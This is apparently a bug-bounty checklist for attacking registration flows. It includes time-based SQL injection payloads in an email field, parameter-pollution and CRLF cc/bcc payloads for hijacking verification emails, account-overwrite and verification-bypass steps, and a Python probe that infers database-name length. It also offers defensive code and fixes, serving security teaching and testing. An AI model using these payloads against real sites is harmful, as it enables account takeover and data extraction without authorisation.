Registration
Throwaway Email Services
Use a throwaway address to register a temporary account:
- https://mail.protonmail.com
- http://en.getairmail.com
- https://temp-mail.org/en
- https://www.mailinator.com
Check the registration process and look for IDORs or endpoints that leak usernames/emails (user enumeration).
# SQLi in Email Field
{"email":"asd'a@a.com"} --> Not Valid
{"email":"asd'or'1'='1@a.com"} --> Valid
{"email":"a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1@a.com"} --> Not Valid
{"email":"\"a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1\"@a.com"} --> Valid --> Delay: 7,854 millis
{"email":"\"a'-IF(LENGTH(database())=10,SLEEP(7),0)or'1'='1\"@a.com"} --> {"code":0,"status":200,"message":"Berhasil"} --> Valid --> Delay: 8,696 millis
{"email":"\"a'-IF(LENGTH(database())=11,SLEEP(7),0)or'1'='1\"@a.com"} --> {"code":0,"status":200,"message":"Berhasil"} --> Valid --> No delay
Wrapping the local part in double quotes (a quoted local part, which RFC 5321 permits) gets the parentheses and commas of the IF(...) payload past the email filter; the response time then reveals LENGTH(database()) = 10. "Berhasil" is Indonesian for "success".
# Resources
- <https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17>
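As an added illustration (this is not code from the write-up above or from its target), the following Python shows why the quoted-local-part payload passes a validator that the plain payload does not, and how a tester drives the time-based probe to infer the length of database(). The two regexes, the `simulated_backend` stand-in, the database name `bug_bounty` and the timing threshold are all assumptions made for this example; the probe shape is the one used on this page.

```python
import re
from typing import Callable, Optional

# Two validator regexes constructed for this example. PERMISSIVE mimics a
# filter that (like RFC 5321) allows a double-quoted local part, so anything
# between the quotes, including ' ( ) and commas, is accepted. STRICT does not.
PERMISSIVE = re.compile(r'^(?:"[^"]*"|[A-Za-z0-9._%+-]+)@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$')
STRICT = re.compile(r'^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$')


def passes(regex: re.Pattern, email: str) -> bool:
    return regex.fullmatch(email) is not None


def length_probe(n: int, delay: int = 7) -> str:
    """Payload in the shape used on this page: the leading single quote closes
    the server-side string literal and a MySQL IF(..., SLEEP(delay), 0) follows,
    all inside a quoted local part so the email filter lets it through."""
    return f"\"a'-IF(LENGTH(database())={n},SLEEP({delay}),0)or'1'='1\"@a.com"


def infer_db_name_length(send: Callable[[str], float], lo: int = 1, hi: int = 64,
                         delay: int = 7, threshold: float = 5.0) -> Optional[int]:
    """Walk candidate lengths; the first probe that stalls for at least
    `threshold` seconds (kept below `delay` to tolerate jitter) is the answer.
    `send` posts one registration request and returns its elapsed seconds."""
    for n in range(lo, hi + 1):
        if send(length_probe(n, delay)) >= threshold:
            return n
    return None


def simulated_backend(db_name: str = "bug_bounty") -> Callable[[str], float]:
    """Stand-in for the vulnerable endpoint (constructed; no network). It
    evaluates only the IF(LENGTH(database())=N, SLEEP(D), 0) fragment and
    reports the delay the real server would have produced, without sleeping."""
    frag = re.compile(r"LENGTH\(database\(\)\)=(\d+),SLEEP\((\d+)\)")

    def send(email: str) -> float:
        m = frag.search(email)
        if m and int(m.group(1)) == len(db_name):
            return int(m.group(2)) + 0.85   # SLEEP(7) plus round trip, like the 7,854 ms above
        return 0.12
    return send


if __name__ == "__main__":
    plain = "a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1@a.com"
    print("plain payload passes permissive filter:", passes(PERMISSIVE, plain))             # False
    print("quoted payload passes permissive filter:", passes(PERMISSIVE, length_probe(10)))  # True
    print("quoted payload passes strict filter:", passes(STRICT, length_probe(10)))          # False
    print("database() length:", infer_db_name_length(simulated_backend()))                  # 10
```

Against a real target, `send` would be a function that posts the JSON body and returns the measured round-trip; the fix on the server side is a parameterised query, since no email filter can be relied on to keep SQL metacharacters out of a quoted local part.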
Email Verification Feature
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
# No domain:
email=victim
# No TLD (Top Level Domain):
email=victim@xyz
# Change parameter case
email=victim@mail.com&Email=attacker@mail.com
# More separators and terminators
email@email.com,victim@hack.secry
email@email","victim@hack.secry
email@email.com:victim@hack.secry
email@email.com%0d%0avictim@hack.secry
%0d%0avictim@hack.secry
%0avictim@hack.secry
victim@hack.secry%0d%0a
victim@hack.secry%0a
victim@hack.secry%0d
victim@hack.secr%00
victim@hack.secry{{}}
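As an added example (not part of the original checklist), the Python below builds the payload shapes listed above and contrasts a handler that naively takes the last `email` value with a hardened extractor that accepts exactly one well-formed address. The sample addresses, the `ADDR_SPEC` regex and the handler names are assumptions for this example; the parsing behaviour shown comes from the Python standard library.

```python
import re
from email.utils import getaddresses
from urllib.parse import parse_qs

VICTIM, ATTACKER = "victim@mail.com", "hacker@mail.com"   # constructed sample addresses

# One addr-spec only: no quotes, spaces, commas, pipes or control characters.
ADDR_SPEC = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")


def variants(victim: str, attacker: str) -> dict:
    """Query strings in the shapes listed above, URL-encoded as a client sends them."""
    return {
        "pollution":      f"email={victim}&email={attacker}",
        "pollution_case": f"email={victim}&Email={attacker}",
        "cc":             f"email={victim}%0A%0Dcc:{attacker}",
        "bcc":            f"email={victim}%0A%0Dbcc:{attacker}",
        "comma":          f"email={victim},{attacker}",
        "space":          f"email={victim}%20{attacker}",
        "pipe":           f"email={victim}|{attacker}",
    }


def naive_pick(query: str) -> str:
    """A handler that takes the last value it saw (parse_qs keeps every repeat)."""
    return parse_qs(query)["email"][-1]


def recipients(field: str) -> list:
    """What a mail layer using the stdlib address parser makes of the field."""
    return [addr for _, addr in getaddresses([field]) if addr]


def single_recipient(query: str):
    """Hardened extraction: exactly one case-sensitive 'email' key with exactly
    one value, which must be one well-formed addr-spec and parse back to itself.
    Returns the address, or None when the request should be refused."""
    qs = parse_qs(query, keep_blank_values=True)
    if [k for k in qs if k.lower() == "email"] != ["email"] or len(qs["email"]) != 1:
        return None
    value = qs["email"][0]
    if ADDR_SPEC.fullmatch(value) is None:       # rejects CRLF, comma, space, pipe, quotes
        return None
    if recipients(value) != [value]:             # defence in depth: one parsed address, unchanged
        return None
    return value


if __name__ == "__main__":
    for name, query in variants(VICTIM, ATTACKER).items():
        print(f"{name:15} naive={parse_qs(query).get('email', ['-'])[-1]!r:45} hardened={single_recipient(query)!r}")
```

The comma case is the instructive one: `recipients("victim@mail.com,hacker@mail.com")` yields two addresses, so any code that passes the raw field to the mailer sends the verification link to both.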
OTP Bypass
# Duplicate registration / Overwrite existing user
1. Create a first account in the application with an email, say abc@gmail.com, and a password.
2. Log out and create another account with the same email and a different password.
3. If the exact email is rejected, try variations of it:
   - change the case: abc@gmail.com -> Abc@gmail.com
   - add a plus tag: abc+1@gmail.com
   - append blank or control characters after the email: test@test.com (trailing space), %00, %09, %20
   - put special characters in the email name, or a second @: victim@gmail.com@attacker.com, victim@attacker.com@gmail.com
   - also try registering with an existing username
4. Finish the creation process and see whether it succeeds.
5. Go back and log in with the email and the new password. If you are logged in, the original account has been overwritten.
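As an added example (not from the original checklist or any of the linked reports), the Python below canonicalises an email before looking it up, so every variant in step 3 maps to the same key or is refused, and an existing account is never overwritten. The `Registry` class, the dot-insensitive provider list and the decision to fold `+tag` sub-addresses into the base mailbox are assumptions made for this example; the last one is a policy choice some sites will not want.

```python
import unicodedata

# Providers known to ignore dots in the local part; an assumption for this
# example, extend it for the providers you actually care about.
DOT_INSENSITIVE = {"gmail.com", "googlemail.com"}


def canonical_email(raw: str):
    """Map every spelling of the same mailbox to one key, or return None if the
    input is not a single plain address. Each step closes one variant listed above."""
    s = unicodedata.normalize("NFKC", raw)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in s):      # %00, %09 tricks
        return None
    s = s.strip()                                             # "test@test.com "
    if s.count("@") != 1:                                     # victim@gmail.com@attacker.com
        return None
    local, domain = s.split("@")
    if not local or not domain or " " in s:
        return None
    domain = domain.lower().rstrip(".")
    if "." not in domain:                                     # no TLD
        return None
    local = local.lower()                                     # abc vs Abc
    local = local.split("+", 1)[0]                            # abc+1@... sub-addressing
    if domain in DOT_INSENSITIVE:
        local = local.replace(".", "")
    if not local:
        return None
    return f"{local}@{domain}"


class Registry:
    """Minimal user store keyed by canonical email (constructed for the demo)."""

    def __init__(self):
        self.users = {}

    def register(self, email: str, password: str) -> str:
        key = canonical_email(email)
        if key is None:
            return "rejected"
        if key in self.users:
            return "duplicate"           # never overwrite the existing record
        self.users[key] = {"email": email, "password": password}
        return "created"


if __name__ == "__main__":
    r = Registry()
    for attempt in ["abc@gmail.com", "Abc@gmail.com", "abc+1@gmail.com", "a.b.c@gmail.com",
                    "abc@gmail.com ", "abc@gmail.com\x00", "victim@gmail.com@attacker.com", "victim@xyz"]:
        print(f"{attempt!r:35} -> {r.register(attempt, 'pw')}")
```

The same canonical form must be used on login and on password reset; normalising only at signup leaves the lookup paths that the duplicate-registration reports above exploit.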
Further Read
<https://hackerone.com/reports/187714>
<https://shahjerry33.medium.com/duplicate-registration-the-twinning-twins-883dfee59eaf>
<https://blog.securitybreached.org/2020/01/22/user-account-takeover-via-signup-feature-bug-bounty-poc/>
---------------------------------------------------------------------------------------------------
# Exploit
# Delete any user account without user interaction
The database accepts the string as is, without converting it to lowercase.
1. Create a normal email, e.g. theuntest@crowd.com
2. After the email is created I am able to bypass verification too.
3. Bypassing the verification is easy: send a valid token to any email. The link will look like: <https://the-vulnreable/confi-endpoint/account/confirmemail?userId=maybeeee@gmail.com&token=ananfnasjfasjnfjasfsaa>
4. Just replace the email with your own and it will be verified.
5. Now log in to the normal account; as shown, I received the JWT normally.
6. After creating an account, customize the email so it looks like MAybeeEE@GmaiL.coM (mixed case).
7. As shown below, I was able to register the customized email as another email.
8. After the email is created I can bypass verification as shown above.
9. The URL will look like: <https://the-vulnreable/confi-endpoint/account/confirmemail?userId=MAybeeEE@GmaiL.coM&token=ananfnasjfasjnfjasfsaa>
10. The user will be verified.
11. Now the two users are both signed up.
12. The user receives "authentication successful" but never receives a JWT, because the customized email conflicts with the old email in the DB.
- <https://m.facebook.com/story.php?story_fbid=pfbid0345dp8U87sY32EfSKAnkqsUNJrN9iMt5WLYFZZQHnimriAbgHv2bBQSEPHPV66Sppl&id=100010641453891&mibextid=Nif5oz>
DoS at Name/Password field in Signup Page
Steps to reproduce:
1. Go to the sign up form.
2. Fill in the form and enter a very long string in the password (or name) field.
3. Submit the form; if the application is vulnerable you get a 500 Internal Server Error.
Further Read
<https://shahjerry33.medium.com/long-string-dos-6ba8ceab3aa0>
<https://hackerone.com/reports/738569>
<https://hackerone.com/reports/223854>
# Path Overwrite
If an application serves user profiles at a direct path /{username}, always try to sign up with system-reserved file names such as index.php, signup.php, login.php, etc. In some cases, after signing up with the username index.php or ../../../../index.php, visiting target.tld/index.php shows your profile instead of the application's index page. Likewise, if an attacker can sign up with the username login.php, the login page itself can be taken over.
Further Read: <https://infosecwriteups.com/logical-flaw-resulting-path-hijacking-dd4d1e1e832f>
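As an added example (not from the linked write-up), the Python below shows the check a signup handler needs before it mounts a profile at /{username}: a strict character class that excludes dots and slashes, plus a collision test against the routes the application already serves. The route table, the username rules and the profile root are assumptions for this example.

```python
import posixpath
import re

# Paths the hypothetical application serves at its web root (constructed);
# a profile mounted at /{username} must never shadow any of them.
APP_ROUTES = {"index.php", "login.php", "signup.php", "logout.php", "admin", "api", "static"}

# No dots, so index.php can never be a username; no slashes or percent signs,
# so neither ../ nor its URL-encoded forms survive.
USERNAME_RE = re.compile(r"[a-z0-9_]{3,30}")


def validate_username(raw: str):
    """Return (username, None) if it is safe to mount at /{username},
    otherwise (None, reason)."""
    name = raw.strip().lower()
    if USERNAME_RE.fullmatch(name) is None:
        return None, "only [a-z0-9_], 3-30 chars"
    if name in APP_ROUTES:
        return None, f"'{name}' collides with an application route"
    return name, None


def resolves_to(profile_root: str, username: str) -> str:
    """Where a router that simply joins the path would land; this is why a
    traversal username ends up on top of the site's own index page."""
    return posixpath.normpath(posixpath.join(profile_root, username))


if __name__ == "__main__":
    for candidate in ["alice_99", "index.php", "../../../../index.php", "admin", "Login.php"]:
        print(f"{candidate!r:28} -> {validate_username(candidate)}   "
              f"naive path: {resolves_to('/u/', candidate)}")
```

Keeping the route list in one place (ideally generated from the framework's own URL map rather than hand-written) is what keeps this check honest as new pages are added.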
# Weak Password Policy
Check whether the program accepts:
1. weak passwords such as 123456
2. a username identical to the email address
3. a password identical to the email address
4. improperly implemented password reset and change features
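As an added example (not part of the original checklist), the Python below is a signup-side policy check covering the first three items: a denylist of common passwords, a comparison of the password against the email, its local part and the username, and a username rule that refuses email-shaped values. The length bounds, the tiny denylist and the function names are assumptions for this example; the upper length bound is there because of the long-string DoS described earlier on this page.

```python
COMMON_PASSWORDS = {"123456", "password", "qwerty", "12345678", "111111"}  # constructed; use a real breached list
MIN_LEN, MAX_LEN = 12, 128   # MAX_LEN bounds what the hash and the rest of the stack have to process


def check_password(password: str, email: str, username: str) -> list:
    """Return the list of policy violations (empty means the password is acceptable).
    Comparisons are case-insensitive because email local parts usually are."""
    problems = []
    if len(password) < MIN_LEN:
        problems.append(f"shorter than {MIN_LEN} characters")
    if len(password) > MAX_LEN:
        problems.append(f"longer than {MAX_LEN} characters")
    p = password.lower()
    if p in COMMON_PASSWORDS:
        problems.append("in the common-password list")
    local = email.split("@", 1)[0].lower()
    if p in {email.lower(), local, username.lower()}:
        problems.append("equal to the email, its local part, or the username")
    return problems


def check_username(username: str, email: str) -> list:
    """A username must not be an email address and must not equal the account email."""
    problems = []
    if "@" in username:
        problems.append("looks like an email address")
    if username.lower() == email.lower():
        problems.append("equal to the email address")
    return problems


if __name__ == "__main__":
    for pw in ["123456", "abc@gmail.com", "ABC", "correct horse battery staple"]:
        print(f"{pw!r:32} -> {check_password(pw, 'abc@gmail.com', 'abc')}")
    print(check_username("abc@gmail.com", "abc@gmail.com"))
```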